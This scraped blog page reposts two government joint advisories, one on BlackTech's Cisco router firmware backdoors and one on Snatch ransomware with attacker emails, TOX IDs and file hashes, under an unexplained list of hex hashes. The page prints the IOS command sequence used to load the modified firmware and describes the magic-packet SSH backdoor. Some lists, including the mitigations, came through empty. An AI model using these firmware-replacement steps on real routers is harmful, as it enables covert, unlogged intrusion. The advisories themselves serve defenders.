0092ce298a1d451fbe93dc4237053a96
00e872019b976e69a874ee7433038754
01ecd9ab9be75e832c83c082be3bdf18
0212a88c7ed149febdefa347c610b248
02be3b93640437dbba47cc7ed5ab7895
03f8852448a85e14f2b4362194160c32
045f8ccdac6d4e769b30da406808da71
04e7f5787f89a597001b50a37b9f8078
070f9fe9f0ec69e6b8791d280fde6a48
07a624d7236cca3934cf1f8e44b74b52
09df72c01a1a0ad193e2fff8e454c9c4
0b28842d64a344c287e6165647f3b3fe
0b8e1211de50d244b89e6c1b366d3ccf
0cb0380cf75a863b3e40a0955b1ada9f
0da24834056873a8cd8311000088e8be
0e1fad8ffaa7a939f0a6cbf9cd7e2fcd
0f6e78839398c245d13f696a3216d840
119f8c9050d1499b6f958b857868b8ce
11c506d5e3fb7e119c4287202c96a930
1336df27f94b25a25acac9db3e61e461
14671c3f8deca7d73a03b74cb854c21d
146caf9bd0153428f54e9ef472154983
14994353f3ea6fd25952a8c7d57f9ecf
151bc875df15d1385e6eb02f9edaba06
15a074a397727b26a846b443b99c20ff
1660f3d882a4311ca013ee4586e01fd9
16a74fc216f8a4ce43466bb83b6d3fd2
188623fdd056c4ed13d1ff34c7377637
19f51486abd40c9f0fc0503559a6c523
1a024e63721c610d2e54e67d62cd5460
1aa7dae8f2ae0a29402ed51819f82db4
1abfdeaadb74a0f7c461e7bab157b17f
1b6720ed0b67c910a80722ce973d6217
1b7d9368c6ce7623fdbc43f013626535
1e0850e10a00c9bbdd5c582ff4cb6833
1ec71612e438cf902913eec993475eb9
206fed3a39d9215c35395663f5bb3307
22cc1b3bc9f99d3a520ae58fee79a0d5
23e3e6fa8b23d9bc19e82de4e64c79e9
253fd4659bf21be116858bc0f206c5b9
276e175d4fe8454c4c47e966d8cb3fa3
289a450c7478dd52a10c6ed2fb47f7e9
2aa8ba7478b1362274666d714df575bc
2beecb6b9e386f29d568229a9953c3d2
2ebc7fdceaa9a0df556e989d77157006
3003024afe64b4e8a5a30825c14bbb12
3082e669dda9d023e2dcd8b9549a84a8
309d33c6f77a3fc75654c44c61596ccd
30a9f568eb3df79352fc587a078623b6
30be84e6b95f44c203f8e7fce7339a8e
3268a5097a543c7dbd82c39a9193b7fe
32775ead3ea1ad7db2f4bea67fe0cabb
34ac9a6ef5d285119abec50fbe41fcfe
34d92552e278710c1e84f0bd8dc3a6b8
361f47a6357cc6e3a9bcdd20cfaaf0e9
3685abc75517e61e47e52e5f2d060f54
3744004013135b9f9a05cb58cda8134d
37d952966ea7e79277803f13d7147544
391a4c2c7541b8b78e2f99bf586e9794
393662e5aa0cb49c5d666a6d10a1ade6
3962b622c5aa815afb803b92aa948424
3b22af324abded2781ed8f6a61f3654f
3b30b4555cc8b4b164ad03cf322cbea8
3bd1bdb5e90b9590a8878bff2ada8204
3be529eb3a7daaf34f963a22188f6139
3dd13faad1c45eb0c23e4567210f7eac
403273b51f91cf3c333695e5532cb2c3
404f56045e436d53ead2177bf957ba39
41854adbc73b0b58e5c566f60bb0df25
43c22dabb1e6d2449a39c2f7e974d537
476e72bbda5b78d188766139889e3038
4898a51256ae7d914a5ffd5695973470
49230c486f0fd383cd301fe162d6a786
4959a611b9885022d81b4bc8e4b1d149
495c6ff7ca0379ad0891bac47917d09a
49d2bd08038dc7dada221008591940f9
4c1b73ec52e6eec0c5d20577fcbc9ef1
4d34db639ba84b11822fb3dac47ed7d1
5244b163f9326a1e5eaa8860f7543f99
539f1a5183800a96228458932f9307f7
5466368d4659f1b1470bcb09e65b484d
549cde6535a884126755fc53f59a820c
555389e92c622b87d3fc395fd8723501
588d0b42e54174a98e1eca59945e8b32
58bc21d305a65c41745327f142f3ac12
59401c9a60449c742d073d93d1b7039a
59eec218522cc5c7743a0d37892a3345
59faf75430e9326d3ae9d231bb3ae8c6
5d0259ca16cfc2d7d1b0fac69f29ab05
5d55026fb84dba91ac01e2095504b1bc
5e35f50c692081fd6c7ddac1272e2d6c
5f4d5965af741bba59b7c8d3425f33dd
6010282004917ecf3900babf61456432
6088c2a04c94cdcd5a283a6d1622ffba
61dee38d2f97220efb1218ad8971e3ab
62ac194f2526eb45485526bca35c8f43
634296a023280d020674c873d0199760
635755dadfab8b92fb502aafb09122db
63fc58be0d7b48eaa34da7f752ae8ae6
6441640409815cfb4bf469e685e1bdb5
646973d1928c401ba80961c12cbf84a2
65eef0a0ee257254ef0418aa57192cfb
66f6a192083a7ab00ae8e0b5cc52e8f4
67a42e2e27ffc26d1f3d0ceb8384afd0
689385f1218e0d4c347595648ca6a776
692f91c0c5e9e93e0a24bd3392887ca1
69ecf52960c8bd9e746dfe9ee19c11f6
6e359f3bbc622e9b1ed36f6e3d521bcf
6e3650528f719fc50988a1f697644832
6ead0d5d3f87911c27f3ae0a75e6b5bc
6f1fa8b444caf0d8238f948279ca74e1
6fb8cdf567dd7d89d53b5771d769cb5f
706b6055658aff067ae370f23831ef6b
708140c311d3d69418f75c928e7535a0
719ec5da8f2153a436ee8567ff609894
7292ef4cdca529071fad97496e1c9439
74871691eac48156ce0da2cfa3ab401a
74cf24f2a66a31c88b6fcfe01f12160c
75e874d8e0a79697633b87ea5e798b1c
76c0d09fed2f33babb0de8ee2c07144c
77a01363fa2b29af25c004da9570e23c
78988c65e9b70e7929e747408d8f0b0e
79c6d12d168b85437384b20eb94e106b
7b4137b4e85f31a81bb5bafeda993947
7b9db1d58326c1fa276ba2a39bcc2617
7cbc7459db5327c26476549f225030f5
7cd727171c2522f51417edeeba4f1791
7e3630c67c802eabb67b108ad4d7ded7
802f5d34c230da40c0912a1c5a9b702b
80bd0f3610f6c4d60584a5be0b8a3016
819030799f0020ed724c2ef3ffaa56c6
8207129585da68066ed08e94216d76ee
821f649d08687e22f96cea99fbb5d3a3
830838cb0620d659405a74401cd72557
833d3201066f5184c874c73a2083c448
840f488b7c0a5d686d1e89908735f354
84301b967a4d9a242466c04901bad691
85c3fac6a9885362c448f434671e362f
883b9fe16e45c388968defc73a5fba7a
8a6b0ba3496eeca39d6d3f9bae830c90
8ad0fd4b78c89bd63b97343fda1eeccb
8b0ae9029974091df12210255aaecad6
8b297f8b219e968932293ee7a8242ca3
8bb1781e756a53cd00d9b2ec670fa21e
8d5515351afdf27b013f96a05bf45147
8fafa73e9985e05d0c1c964da770c567
905967b08bd44cfa60d969229921ac23
9188ef45ea917a91ec9b92b5dd8cd90d
918dfab0333ae15d61f14fd24b5eaaac
922a3272aad17c9eaad733696a4321da
9253399537fad8448f1d4732dd79f6fa
934a8a6528e91caa019acb76e791a71d
95588e0386206fa02912cfcaf18c1220
9610328cdaa4694800c2c93410f8ce82
9622902cc43f4a20d0d686a37e4d8232
96c41e4c4a1812187fb279b9299ad63b
984c4653a563b19c87f264611a6adc01
9980febfaf901d4113a1c473f79d7eb6
9a176d818edff838fc057cea3ee372c0
9ba21c5148913186a5bf877078cbc048
9cfda02ef7e04c469b77f8197a249c17
9d74d395bd2f72a47a5c980e6040df5a
9df128ebe0c82064aa746647883112c9
9e5613533972a9d42d2e3344a4e58566
9ec17429eed5446e3720796ab50d8c60
9f2438aaab4744c4b7b5b7287a783099
9f3bf94572344b36f6ef1689cb30c66e
9fdd7a85b3a4ef8ded73beb3e6218109
a1b732a9af792f75a68ed78d72ffb8f6
a260d836428cdb971bdf147ca6940160
a4f11b1eb659869a0ae70898a4a0e5ee
a596ebbcf438980c880d711315e4fdf1
a80b6a354b493264f37aa39d0d41b5fc
a89df6156eb5a2de196388d4a123b470
a96837fe533247abb7f88000d0216a50
a98cf0a359f430a00f4f3d522f5b6cc0
aa2fe3a253e169b05e1782ca57a688d2
aef0172a2c03f77912de0bbf14aee00f
af06c3e72f2f307515ba549174d8e5a6
b311ab82b30f41b12cb9089d00c4a1ff
b4f31423445b5f13675f205ac997f41f
b50666c9aed1c2f222c56b6e9b326d27
b53f179b3f25f72bb0c7ccf45bf8beee
b57f3e41c03803306b0ee2111f7ef823
b79434613820faf30d58f103c4415a29
b8366aaa5ed51c0dea3fc90ef7e14889
b8f6b0d234a305c25411e83fd430c624
b956ed2b848dabb4e79ab7358233861b
b9ecb08402df0f1f6e1ce76b8ad6e91f
ba4a616c8d4ab9358a82b321d8e618bf
bcd62f3e029f96f62c24d50d2d1402ac
bcf75736d176394f3df69f3e0ef7dd9f
be1f24457141d80206bc2e58f55dc879
c013f308d170aa2eca4a5b0f0bbd3ccb
c0a2fd066c955137036f92da2c3a3ff1
c17b3ec40ed5216e44311138aafaea2c
c262a39f49604f05a5656213f758cd46
c66f36eb180438882133717c3abb5157
c986c7bf720ce1463c3d628d2b3dad01
c9c16287cbbe5a037244e374ba84aecc
cbcd728a2350712b5747cd3447473deb
cbeeb123efe8cf7f842426b673415c28
ccb15eef4287c8efa472915bcb4ec458
ccdddb69e9344a039c4ac9c49a6f2d7b
cd1312be032256a10cf866af3e9afae9
ce0dd163d9e02bfd42d61024523cb134
ceef2e728db1b5ae15432f844eeb66e1
d12d98a0877f6e3c8b5a59f41cc4de9b
d131f17689f1f585e9bfdcdb72a626bb
d173076d97a0400a56c81089912b9218
d255291bb8e460626cb906ebacc670e5
d2cea317778ad6412c458a8a33b964fd
d3cfee76468a9556fd9d017c1c8ee028
d3d72f4c7038f7313ad0570e16c293bf
d485a1b5db2f97dc56500376d677aa89
d662d20507bebc37b99a4d413afa2752
d711d577b9943ab4e2f8a2e06bb963e3
d92e87d2689957765987e2be732d728e
d966c6c822122e96f6e9f5f1d4778391
daee31d7cc6e08ead6afad2175989e1d
dbb293176747fa1c2e03cbc09433f236
dc26ef761c7ec40591b1fe6e561b521d
dc9e6edeb7557bc80be68be15cebb77a
dddfbae77336120febd5ad690af3e341
e1f579227327ebb21cde3f9e7511db01
e3c642432a815a07f035e01308aaa8fc
e54329351788661f2a8d4677a759fc42
e82b7ad2c05f4617efbc86a78c1e61e9
e99cffa2afa064625f09e1c5aca8f961
ea6bd3db104ca210b5ad947d46134aaf
eb277d809a59d39d02605c0edd9333e9
ed82a50d98700179c8ae70429457477a
ef35374f4146b3532f0902d6f7f0ef8c
ef4c4d79f02ac404f47513d3a73e20c7
f05a5a60ad6f92d6f28fa4f13ded952f
f0776dfe17867709fdb0e0183ed71698
f20fbfd508e24d50522eadf0186b03eb
f3d751b0585855077b46dfce226cfea1
f4dd9bb28d680a3368136fb3755e7ea9
f804388f302af1f999e4664543c885a1
f8bcc8f99a3afde66d7f5afb5d8f1b43
f8d6f89aecf792e844e72015c9f27c95
f967460f8c6de1cedb180c90c98bfe98
f9d5cc0cbae77ea1a371131f62662b6b
fa4f1a3b215888bc5f19b9f91ba37519
fdff2bf247a7dad40bac228853d5a661
fe6e7fac4f0b4f25d215e28ca8a22957
fe9de1cdd645971c5d15ee1873c3ff8d
febba89b4b9a9649b3a3bf41c4c7d853
|
People’s Republic of China-Linked Cyber Actors Hide in Router Firmware
Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’informationExecutive Summary
The United States National Security Agency (NSA), the U.S. Federal Bureau of Investigation (FBI), the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Japan National Police Agency (NPA), and the Japan National Center of Incident Readiness and Strategy for Cybersecurity (NISC) (hereafter referred to as the “authoring agencies”) are releasing this joint cybersecurity advisory (CSA) to detail activity of the People’s Republic of China (PRC)-linked cyber actors known as BlackTech. BlackTech has demonstrated capabilities in modifying router firmware without detection and exploiting routers’ domain-trust relationships for pivoting from international subsidiaries to headquarters in Japan and the U.S. — the primary targets. The authoring agencies recommend implementing the mitigations described to detect this activity and protect devices from the backdoors the BlackTech actors are leaving behind.
BlackTech (a.k.a. Palmerworm, Temp.Overboard, Circuit Panda, and Radio Panda) actors have targeted government, industrial, technology, media, electronics, and telecommunication sectors, including entities that support the militaries of the U.S. and Japan. BlackTech actors use custom malware, dual-use tools, and living off the land tactics, such as disabling logging on routers, to conceal their operations. This CSA details BlackTech’s tactics, techniques, and procedures (TTPs), which highlights the need for multinational corporations to review all subsidiary connections, verify access, and consider implementing Zero Trust models to limit the extent of a potential BlackTech compromise.
For more information on the risks posed by this deep level of unauthorized access, see the CSA People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices.[1]
Download the PDF version of this report: PDF, 808 KB
Technical Details
This advisory uses the MITRE® ATT&CK® for Enterprise framework, version 13.1. See the Appendix: MITRE ATT&CK Techniques for all referenced TTPs.
Background
Active since 2010, BlackTech actors have historically targeted a wide range of U.S. and East Asia public organizations and private industries. BlackTech actors’ TTPs include developing customized malware and tailored persistence mechanisms for compromising routers. These TTPs allow the actors to disable logging [T1562] and abuse trusted domain relationships [T1199] to pivot between international subsidiaries and domestic headquarters’ networks.
Observable TTPs
BlackTech cyber actors use custom malware payloads and remote access tools (RATs) to target victims’ operating systems. The actors have used a range of custom malware families targeting Windows®, Linux®, and FreeBSD® operating systems. Custom malware families employed by BlackTech include:
BlackTech actors continuously update these tools to evade detection [TA0005] by security software. The actors also use stolen code-signing certificates [T1588.003] to sign the malicious payloads, which make them appear legitimate and therefore more difficult for security software to detect [T1553.002].
BlackTech actors use living off the land TTPs to blend in with normal operating system and network activities, allowing them to evade detection by endpoint detection and response (EDR) products. Common methods of persistence on a host include NetCat shells, modifying the victim registry [T1112] to enable the remote desktop protocol (RDP) [T1021.001], and secure shell (SSH) [T1021.004]. The actors have also used SNScan for enumeration [TA0007], and a local file transfer protocol (FTP) server [T1071.002] to move data through the victim network. For additional examples of malicious cyber actors living off the land, see People’s Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection.[2]
Pivoting from international subsidiaries
The PRC-linked BlackTech actors target international subsidiaries of U.S. and Japanese companies. After gaining access [TA0001] to the subsidiaries’ internal networks, BlackTech actors are able to pivot from the trusted internal routers to other subsidiaries of the companies and the headquarters’ networks. BlackTech actors exploit trusted network relationships between an established victim and other entities to expand their access in target networks.
Specifically, upon gaining an initial foothold into a target network and gaining administrator access to network edge devices, BlackTech cyber actors often modify the firmware to hide their activity across the edge devices to further maintain persistence in the network. To extend their foothold across an organization, BlackTech actors target branch routers—typically smaller appliances used at remote branch offices to connect to a corporate headquarters—and then abuse the trusted relationship [T1199] of the branch routers within the corporate network being targeted. BlackTech actors then use the compromised public-facing branch routers as part of their infrastructure for proxying traffic [TA0011], blending in with corporate network traffic, and pivoting to other victims on the same corporate network [T1090.002].
Maintaining access via stealthy router backdoors
BlackTech has targeted and exploited various brands and versions of router devices. TTPs against routers enable the actors to conceal configuration changes, hide commands, and disable logging while BlackTech actors conduct operations. BlackTech actors have compromised several Cisco® routers using variations of a customized firmware backdoor [T1542.004]. The backdoor functionality is enabled and disabled through specially crafted TCP or UDP packets [T1205]. This TTP is not solely limited to Cisco routers, and similar techniques could be used to enable backdoors in other network equipment.
In some cases, BlackTech actors replace the firmware for certain Cisco IOS®-based routers with malicious firmware. Although BlackTech actors already had elevated privileges [TA0004] on the router to replace the firmware via command-line execution, the malicious firmware is used to establish persistent backdoor access [TA0003] and obfuscate future malicious activity. The modified firmware uses a built-in SSH backdoor [T1556.004], allowing BlackTech actors to maintain access to the compromised router without BlackTech connections being logged [T1562.003]. BlackTech actors bypass the router’s built-in security features by first installing older legitimate firmware [T1601.002] that they then modify in memory to allow the installation of a modified, unsigned bootloader and modified, unsigned firmware [T1601.001]. The modified bootloader enables the modified firmware to continue evading detection [T1553.006], however, it is not always necessary.
BlackTech actors may also hide their presence and obfuscate changes made to compromised Cisco routers by hiding Embedded Event Manager (EEM) policies—a feature usually used in Cisco IOS to automate tasks that execute upon specified events—that manipulate Cisco IOS Command-Line Interface (CLI) command results. On a compromised router, the BlackTech-created EEM policy waits for specific commands to execute obfuscation measures or deny execution of specified legitimate commands. This policy has two functions: (1) to remove lines containing certain strings in the output of specified, legitimate Cisco IOS CLI commands [T1562.006], and (2) prevent the execution of other legitimate CLI commands, such as hindering forensic analysis by blocking copy, rename, and move commands for the associated EEM policy [T1562.001].
Firmware replacement process
BlackTech actors utilize the following file types to compromise the router. These files are downloaded to the router via FTP or SSH.
File Type
Description
Old Legitimate Firmware
The IOS image firmware is modified in memory to allow installation of the Modified Firmware and Modified Bootloader.
Modified Firmware
The firmware has a built-in SSH backdoor, allowing operators to have unlogged interaction with the router.
Modified Bootloader
The bootloader allows Modified Firmware to continue evading the router’s security features for persistence across reboots. In some cases, only modified firmware is used.
BlackTech actors use the Cisco router’s CLI to replace the router’s IOS image firmware. The process begins with the firmware being modified in memory—also called hot patching—to allow the installation of a modified bootloader and modified firmware capable of bypassing the router’s security features. Then, a specifically constructed packet triggers the router to enable the backdoor that bypasses logging and the access control list (ACL). The steps are as follows:
config t
no boot system usbflash0 [filename]
boot system usbflash0 [filename]
end
write
reload
conf t
no boot system usbflash0 [filename]
boot system usbflash0 [filename]
end
write
upgrade rom file bootloader
Modified bootloader
To allow the modified bootloader and firmware to be installed on Cisco IOS without detection, the cyber actors install an old, legitimate firmware and then modify that running firmware in memory to bypass firmware signature checks in the Cisco ROM Monitor (ROMMON) signature validation functions. The modified version’s instructions allow the actors to bypass functions of the IOS Image Load test and the Field Upgradeable ROMMON Integrity test.
Modified firmware
BlackTech actors install modified IOS image firmware that allows backdoor access via SSH to bypass the router’s normal logging functions. The firmware consists of a Cisco IOS loader that will load an embedded IOS image.
BlackTech actors hook several functions in the embedded Cisco IOS image to jump to their own code. They overwrite existing code to handle magic packet checking, implement an SSH backdoor, and bypass logging functionality on the compromised router. The modified instructions bypass command logging, IP address ACLs, and error logging.
To enable the backdoor functions, the firmware checks for incoming trigger packets and enables or disables the backdoor functionality. When the backdoor is enabled, associated logging functions on the router are bypassed. The source IP address is stored and used to bypass ACL handling for matching packets. The SSH backdoor includes a special username that does not require additional authentication.
Detection and Mitigation Techniques
In order to detect and mitigate this BlackTech malicious activity, the authoring agencies strongly recommend the following detection and mitigation techniques. It would be trivial for the BlackTech actors to modify values in their backdoors that would render specific signatures of this router backdoor obsolete. For more robust detection, network defenders should monitor network devices for unauthorized downloads of bootloaders and firmware images and reboots. Network defenders should also monitor for unusual traffic destined to the router, including SSH.
The following are the best mitigation practices to defend against this type of malicious activity:
Note: An adversary with unauthorized privileged level access to a network device could revert this configuration change.[3]
Works Cited
[1] Joint CSA, People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices, https://media.defense.gov/2022/Jun/07/2003013376/-1/-1/0/CSA_PRC_SPONSORED_CYBER_ACTORS_EXPLOIT_NETWORK_PROVIDERS_DEVICES_TLPWHITE.PDF
[2] Joint CSA, People’s Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection, https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_PRC_State_Sponsored_Cyber_Living_off_the_Land_v1.1.PDF
[3] NSA, Network Infrastructure Security Guide, https://media.defense.gov/2022/Jun/15/2003018261/-1/-1/0/CTR_NSA_NETWORK_INFRASTRUCTURE_SECURITY_GUIDE_20220615.PDF
[4] NSA, Performing Out-of-Band Network Management, https://media.defense.gov/2020/Sep/17/2002499616/-1/-1/0/PERFORMING_OUT_OF_BAND_NETWORK_MANAGEMENT20200911.PDF
[5] Cisco, Attackers Continue to Target Legacy Devices, https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
Disclaimer of endorsement
The information and opinions contained in this document are provided “as is” and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government or Japan, and this guidance shall not be used for advertising or product endorsement purposes.
Trademark recognition
Cisco and Cisco IOS are registered trademarks of Cisco Technology, Inc.
FreeBSD is a registered trademark of The FreeBSD Foundation.
Linux is a registered trademark of Linus Torvalds.
MITRE and MITRE ATT&CK are registered trademarks of The MITRE Corporation.
Windows is a registered trademark of Microsoft Corporation.
Purpose
This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate cyber threats, and to develop and issue cybersecurity specifications and mitigations.
Contact
NSA Cybersecurity Report Questions and Feedback: CybersecurityReports@nsa.gov
NSA’s Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov
NSA Media Inquiries / Press Desk: 443-634-0721, MediaRelations@nsa.gov
U.S. organizations: Report incidents and anomalous activity to CISA 24/7 Operations Center at Report@cisa.dhs.gov, cisa.gov/report, or (888) 282-0870 and/or to the FBI via your local FBI field office.
Appendix: MITRE ATT&CK Techniques
See Tables 2-9 for all referenced BlackTech tactics and techniques in this advisory.
Technique Title
ID
Use
Obtain Capabilities: Code Signing Certificates
T1588.003
BlackTech actors use stolen code-signing certificates to sign payloads and evade defenses.
Technique Title
ID
Use
Initial Access
TA0001
BlackTech actors gain access to victim networks by exploiting routers.
Trusted Relationship
T1199
BlackTech actors exploit trusted domain relationships of routers to gain access to victim networks.
Technique Title
ID
Use
Persistence
TA0003
BlackTech actors gain persistent access to victims’ networks.
Traffic Signaling
T1205
BlackTech actors send specially crafted packets to enable or disable backdoor functionality on a compromised router.
Pre-OS Boot: ROMMONkit
T1542.004
BlackTech actors modify router firmware to maintain persistence.
Technique Title
ID
Use
Privilege Escalation
TA0004
BlackTech actors gain elevated privileges on a victim’s network.
Technique Title
ID
Use
Defense Evasion
TA0005
BlackTech actors configure their tools to evade detection by security software and EDR.
Modify Registry
T1112
BlackTech actors modify the victim’s registry.
Impair Defenses
T1562
BlackTech actors disable logging on compromised routers to avoid detection and evade defenses.
Impair Defenses: Impair Command History Logging
T1562.003
BlackTech actors disable logging on the compromised routers to prevent logging of any commands issued.
Modify System Image: Patch System Image
T1601.001
BlackTech actors modify router firmware to evade detection.
Technique Title
ID
Use
Discovery
TA0007
BlackTech actors use SNScan to enumerate victims’ networks and obtain further network information.
Technique Title
ID
Use
Remote Services: Remote Desktop Protocol
T1021.001
BlackTech actors use RDP to move laterally across a victim’s network.
Remote Services: SSH
T1021.004
BlackTech actors use SSH to move laterally across a victim’s network.
Technique Title
ID
Use
Command and Control
TA0011
BlackTech actors compromise and control a victim’s network infrastructure.
Application Layer Protocol: File Transfer Protocols
T1071.002
BlackTech actors use FTP to move data through a victim’s network or to deliver scripts for compromising routers.
Proxy
T1090
BlackTech actors use compromised routers to proxy traffic.
Source de l’article sur us-cert.gov
#StopRansomware: Snatch Ransomware
Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’informationSUMMARY
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known ransomware IOCs and TTPs associated with the Snatch ransomware variant identified through FBI investigations as recently as June 1, 2023.
Since mid-2021, Snatch threat actors have consistently evolved their tactics to take advantage of current trends in the cybercriminal space and leveraged successes of other ransomware variants’ operations. Snatch threat actors have targeted a wide range of critical infrastructure sectors including the Defense Industrial Base (DIB), Food and Agriculture, and Information Technology sectors. Snatch threat actors conduct ransomware operations involving data exfiltration and double extortion. After data exfiltration often involving direct communications with victims demanding ransom, Snatch threat actors may threaten victims with double extortion, where the victims’ data will be posted on Snatch’s extortion blog if the ransom goes unpaid.
FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
TECHNICAL DETAILS
Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
First appearing in 2018, Snatch operates a ransomware-as-a-service (RaaS) model and claimed their first U.S.-based victim in 2019. Originally, the group was referred to as Team Truniger, based on the nickname of a key group member, Truniger, who previously operated as a GandCrab affiliate. Snatch threat actors use a customized ransomware variant notable for rebooting devices into Safe Mode [T1562.009], enabling the ransomware to circumvent detection by antivirus or endpoint protection, and then encrypting files when few services are running.
Snatch threat actors have been observed purchasing previously stolen data from other ransomware variants in an attempt to further exploit victims into paying a ransom to avoid having their data released on Snatch’s extortion blog. Note: Since November 2021, an extortion site operating under the name Snatch served as a clearinghouse for data exfiltrated or stolen from victim companies on Clearnet and TOR hosted by a bulletproof hosting service. In August 2023, individuals claiming to be associated with the blog gave a media interview claiming the blog was not associated with Snatch ransomware and “none of our targets has been attacked by Ransomware Snatch…”, despite multiple confirmed Snatch victims’ data appearing on the blog alongside victims associated with other ransomware groups, notably Nokoyawa and Conti.[1]
Initial Access and Persistence
Snatch threat actors employ several different methods to gain access to and maintain persistence on a victim’s network. Snatch affiliates primarily rely on exploiting weaknesses in Remote Desktop Protocol (RDP) [T1133] for brute-forcing and gaining administrator credentials to victims’ networks [T1110.001]. In some instances, Snatch affiliates have sought out compromised credentials from criminal forums/marketplaces [T1078].
Snatch threat actors gain persistence on a victim’s network by compromising an administrator account [T1078.002] and establishing connections over port
443
[T1071.001] to a command and control (C2) server located on a Russian bulletproof hosting service [T1583.003]. Per IP traffic from event logs provided by recent victims, Snatch threat actors initiated RDP connections from a Russian bulletproof hosting service and through other virtual private network (VPN) services [T1133].Data Discovery and Lateral Movement
Snatch threat actors were observed using different TTPs to discover data, move laterally, and search for data to exfiltrate. Snatch threat actors use
sc.exe
to configure, query, stop, start, delete, and add system services using the Windows Command line. In addition tosc.exe
, Snatch threat actors also use tools such as Metasploit and Cobalt Strike [S0154].Prior to deploying the ransomware, Snatch threat actors were observed spending up to three months on a victim’s system. Within this timeframe, Snatch threat actors exploited the victim’s network [T1590], moving laterally across the victim’s network with RDP [T1021.001] for the largest possible deployment of ransomware and searching for files and folders [T1005] for data exfiltration [TA0010] followed by file encryption [T1486].
Defense Evasion and Execution
During the early stages of ransomware deployment, Snatch threat actors attempt to disable antivirus software [T1562.001] and run an executable as a file named
safe.exe
or some variation thereof. In recent victims, the ransomware executable’s name consisted of a string of hexadecimal characters which match theSHA-256
hash of the file in an effort to defeat rule-based detection [T1036]. Upon initiation, the Snatch ransomware payload queries and modifies registry keys [T1012][T1112], uses various native Windows tools to enumerate the system [T1569.002], finds processes [T1057], and creates benign processes to execute Windows batch (.bat
) files [T1059.003]. In some instances, the program attempts to remove all the volume shadow copies from a system [T1490]. After the execution of the batch files, the executable removes the batch files from the victim’s filesystem [T1070.004].The Snatch ransomware executable appends a series of hexadecimal characters to each file and folder name it encrypts—unique to each infection—and leaves behind a text file titled
HOW TO RESTORE YOUR FILES.TXT
in each folder. Snatch threat actors communicate with their victims through email and the Tox communication platform based on identifiers left in ransom notes or through their extortion blog. Since November 2021, some victims reported receiving a spoofed call from an unknown female who claimed association with Snatch and directed them to the group’s extortion site. In some instances, Snatch victims had a different ransomware variant deployed on their systems, but received a ransom note from Snatch threat actors. As a result, the victims’ data is posted on the ransomware blog involving the different ransomware variant and on the Snatch threat actors’ extortion blog.Indicators of Compromise (IOCs)
The Snatch IOCs detailed in this section were obtained through FBI investigations from September 2022 through June 2023.
Email Domains and Addresses
Since 2019, Snatch threat actors have used numerous email addresses to email victims. Email addresses used by Snatch threat actors are random but usually originate from one of the following domains listed in Tables 1 and 2:
Email Domains
sezname[.]cz
cock[.]li
airmail[.]cc
Table 2 shows a list of legitimate email domains offering encrypted email services that have been used by Snatch threat actors. These email domains are all publicly available and legal. The use of these email domains by a threat actor should not be attributed to the email domains, absent specific articulable facts tending to show they are used at the direction or under the control of a threat actor.
Email Domains
tutanota[.]com / tutamail[.]com / tuta[.]io
mail[.]fr
keemail[.]me
protonmail[.]com / proton[.]me
swisscows[.]email
The email addresses listed in Table 3 were reported by recent victims.
Email Addresses
sn.tchnews.top@protonmail[.]me
funny385@swisscows[.]email
funny385@proton[.]me
russellrspeck@seznam[.]cz
russellrspeck@protonmail[.]com
Mailz13MoraleS@proton[.]me
datasto100@tutanota[.]com
snatch.vip@protonmail[.]com
TOX Messaging IDs
CAB3D74D1DADE95B52928E4D9DFC003FF5ADB2E082F59377D049A91952E8BB3B419DB2FA9D3F
7229828E766B9058D329B2B4BC0EDDD11612CBCCFA4811532CABC76ACF703074E0D1501F8418
83E6E3CFEC0E4C8E7F7B6E01F6E86CF70AE8D4E75A59126A2C52FE9F568B4072CA78EF2B3C97
0FF26770BFAEAD95194506E6970CC1C395B04159038D785DE316F05CE6DE67324C6038727A58
NOTE: According to ransom notes, this is a “Customer service” TOX to reach out to if the original TOX ID does not respond.
Folder Creation
C:$SysReset
Filenames
SHA-256
qesbdksdvnotrjnexutx.bat
0965cb8ee38adedd9ba06bdad9220a35890c2df0e4c78d0559cd6da653bf740f
eqbglqcngblqnl.bat
1fbdb97893d09d59575c3ef95df3c929fe6b6ddf1b273283e4efadf94cdc802d
safe.exe
5950b4e27554585123d7fca44e83169375c6001201e3bf26e57d079437e70bcd
safe.exe
7018240d67fd11847c7f9737eaaae45794b37a5c27ffd02beaacaf6ae13352b3
safe.exe
28e82f28d0b9eb6a53d22983e21a9505ada925ebb61382fabebd76b8c4acff7c
safe.exe
fc31043b5f079ce88385883668eeebba76a62f77954a960fb03bf46f47dbb066
DefenderControl.exe
a201f7f81277e28c0bdd680427b979aee70e42e8a98c67f11e7c83d02f8fe7ae
PRETTYOCEANApplicationdrs.bi
6992aaad3c47b938309fc1e6f37179eb51f028536f8afc02e4986312e29220c0
Setup.exe
510e9fa38a08d446189c34fe6125295f410b36f00aceb65e7b4508e9d7c4e1d1
WRSA.exe
